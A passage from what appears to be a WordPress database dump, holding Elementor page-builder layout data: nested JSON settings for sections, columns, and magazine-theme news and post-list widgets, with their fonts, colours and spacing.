":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1285,456,'_elementor_version','0.4'),(1286,456,'_elementor_css','a:3:{s:4:\"time\";i:1508894031;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1287,457,'_elementor_edit_mode','builder'),(1288,457,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\